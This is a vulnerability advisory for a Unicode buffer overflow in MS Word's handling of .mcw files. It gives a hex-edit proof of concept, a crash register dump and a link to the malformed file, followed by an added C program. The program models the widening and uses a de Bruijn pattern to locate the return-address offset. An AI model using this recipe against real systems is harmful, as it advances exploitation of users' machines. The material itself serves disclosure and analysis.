UNICODE BUFFER OVERFLOW IN MS-WORD
==================================

*.mcw is the file extension of Word for Macintosh documents. A buffer overflow
occurs when MS Word opens a malformed *.mcw document. The overflow is a Unicode
one: the overlong string is widened from ANSI to UTF-16 on its way onto the
stack, so a run of 41 ("A") bytes lands as 00 41 00 41, and both the saved EBP
and the saved return address (EIP) end up as 00410041 in the register dump
below.

Proof of concept:
-----------------

Modify the *.mcw file with a binary (hex) editor as follows. These lines were
taken from the unmodified .mcw file:

------snip---mcw-file----
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00
00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77
------snip---------------

The strings look length-prefixed: 04 precedes the 4-byte "test", 06 precedes
the 6-byte " Bahaa", and 0f precedes "Times New...". The proof of concept
leaves the 04 in place and simply extends "test" with a long run of 41 bytes,
pushing the rest of the record down, so whatever copies this string is not
bounding the copy by that prefix.

Change them as follows:

------snip---mcw-file----
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 00 06 20 42 61 68 61 61 00 00 00 09
00 00 00 00 0f 54 69 6d 65 73
------snip---------------

Opening the modified document crashes Word with the following x86 register
state:

------------
EAX = 00000000
EBX = 00000000
ECX = 00000006
EDX = 7C90EB94
ESI = 00000001
EDI = 001262B0
EIP = 00410041
ESP = 00126110
EBP = 00410041
EFL = 00000246
------------

EIP = 00410041 is the UTF-16LE encoding of "AA": the saved frame pointer and
return address were overwritten with widened copies of the inserted bytes, not
with the raw 41 41 41 41. That confirms the ANSI-to-Unicode conversion and also
constrains exploitation: the attacker controls only the low byte of each
16-bit half of EIP (00xx00yy), so turning this crash into code execution would
need the usual Unicode-overflow techniques. The proof of concept as given
demonstrates the crash only.

* The modified .mcw file can be downloaded from:
  http://study.haifa.ac.il/~bnaamnih/word/foo.mcw

---------------------
Bahaa Naamnmeh
b_naamneh@xxxxxxxxxxx
www.bsecurity.tk
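As an added example (not part of the original advisory and not the author's code), the C program below models the mechanics behind the register dump above: it builds the malformed record by inserting a run of 41 bytes after the "test" string, widens that run from ANSI to UTF-16LE the way the crash indicates Word does, shows that any 4-byte slot covered by the widened run reads 0x00410041, and decodes a crash EIP back into the two source bytes. It then goes one step beyond the advisory: filling the field with a de Bruijn B(62,2) pattern instead of plain "A"s lets the EIP value (00xx00yy) identify the exact offset of the two characters that hit the return address, which a repeating pattern cannot do with only a 2-character window. MCW_ORIG is copied from the unmodified dump; the marker search, the 110-byte fill, the pattern alphabet and the chosen slot offsets are illustrative assumptions, and the program only simulates the widening, it does not reproduce the crash.

```c
/* Added example, not from the advisory: models the ANSI -> UTF-16 widening that
 * turns a run of 0x41 into EIP = 0x00410041, plus the byte-level PoC edit and a
 * de Bruijn pattern for offset recovery (assumptions, see lead-in). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes around the "test" field, copied from the unmodified dump in the advisory. */
static const uint8_t MCW_ORIG[] = {
    0x11,0x04,0x74,0x65,0x73,0x74,0x00,0x06,0x20,0x42,0x61,0x68,0x61,0x61,0x00,0x00,
    0x00,0x09,0x00,0x00,0x00,0x00,0x0f,0x54,0x69,0x6d,0x65,0x73,0x20,0x4e,0x65,0x77 };

/* Copy orig to out, inserting `fill` copies of `byte` between "test" and its
 * terminating 0x00 (the edit the advisory makes by hand in a hex editor).
 * Returns the new length, or 0 if the marker is missing or out is too small. */
static size_t build_poc(const uint8_t *orig, size_t n, size_t fill, uint8_t byte,
                        uint8_t *out, size_t cap)
{
    static const uint8_t marker[] = { 0x04, 't', 'e', 's', 't', 0x00 };
    size_t at = 0;                                   /* index of the 0x00 after "test" */
    for (size_t i = 0; i + sizeof marker <= n; i++)
        if (memcmp(orig + i, marker, sizeof marker) == 0) { at = i + sizeof marker - 1; break; }
    if (at == 0 || n + fill > cap) return 0;
    memcpy(out, orig, at);
    memset(out + at, byte, fill);
    memcpy(out + at + fill, orig + at, n - at);
    return n + fill;
}

/* ANSI -> UTF-16LE for 7-bit input: each byte b becomes b, 0x00. Returns bytes written. */
static size_t widen_ascii(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    if (2 * n > cap) return 0;
    for (size_t i = 0; i < n; i++) { out[2 * i] = in[i]; out[2 * i + 1] = 0x00; }
    return 2 * n;
}

/* Little-endian 32-bit read: the value a saved EIP/EBP slot under `p` would hold. */
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* If eip has the 00xx00yy shape of widened ANSI, recover the two source bytes
 * (lower address first) and return 1; otherwise return 0. */
static int decode_unicode_eip(uint32_t eip, uint8_t src[2])
{
    if ((eip & 0xFF00FF00u) != 0) return 0;
    src[0] = (uint8_t)(eip & 0xFF);
    src[1] = (uint8_t)((eip >> 16) & 0xFF);
    return 1;
}

/* de Bruijn B(62,2) over A-Za-z0-9: every ordered pair of symbols occurs exactly
 * once, so the two characters that reach EIP pin down their offset in the field. */
#define K 62
static const char ALPHA[K + 1] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
static uint8_t PATTERN[K * K + 1];
static size_t pattern_len;

static void db_rec(int t, int p, int a[3])              /* standard recursive construction, n = 2 */
{
    if (t > 2) {
        for (int j = 1; j <= p; j++) PATTERN[pattern_len++] = (uint8_t)ALPHA[a[j]];
    } else {
        a[t] = a[t - p];
        db_rec(t + 1, p, a);
        for (int j = a[t - p] + 1; j < K; j++) { a[t] = j; db_rec(t + 1, t, a); }
    }
}

static size_t build_pattern(void)
{
    int a[3] = { 0, 0, 0 };
    pattern_len = 0;
    db_rec(1, 1, a);
    PATTERN[pattern_len++] = PATTERN[0];   /* close the cycle so the wrap-around pair occurs linearly too */
    return pattern_len;
}

/* Offset in the pattern (hence in the field) of the pair that landed in EIP, or -1. */
static long pattern_offset(uint32_t eip)
{
    uint8_t src[2];
    if (!decode_unicode_eip(eip, src)) return -1;
    for (size_t i = 0; i + 1 < pattern_len; i++)
        if (PATTERN[i] == src[0] && PATTERN[i + 1] == src[1]) return (long)i;
    return -1;
}

int main(void)
{
    uint8_t poc[256], wide[512], src[2];
    size_t n = build_poc(MCW_ORIG, sizeof MCW_ORIG, 110, 0x41, poc, sizeof poc);
    size_t w = widen_ascii(poc + 6, 110, wide, sizeof wide);
    printf("poc is %zu bytes; widened run is %zu bytes; a slot under it reads %08lx\n",
           n, w, (unsigned long)le32(wide + 40));
    if (decode_unicode_eip(0x00410041u, src))
        printf("EIP 00410041 <- source bytes %02x %02x (\"%c%c\"): widened ANSI overflow\n",
               src[0], src[1], src[0], src[1]);
    build_pattern();
    printf("with a de Bruijn fill, EIP 00410042 would mean field offset %ld\n",
           pattern_offset(0x00410042u));
    return 0;
}
```

The decode step is the triage check: an EIP whose every other byte is 00 is the signature of an ANSI-to-Unicode widening overflow, and EDX = 7C90EB94 from the dump correctly fails that test. Swapping the 41 run for the de Bruijn fill when rebuilding the .mcw lets the crash EIP give the offset of the return address directly instead of requiring repeated runs with different fill lengths.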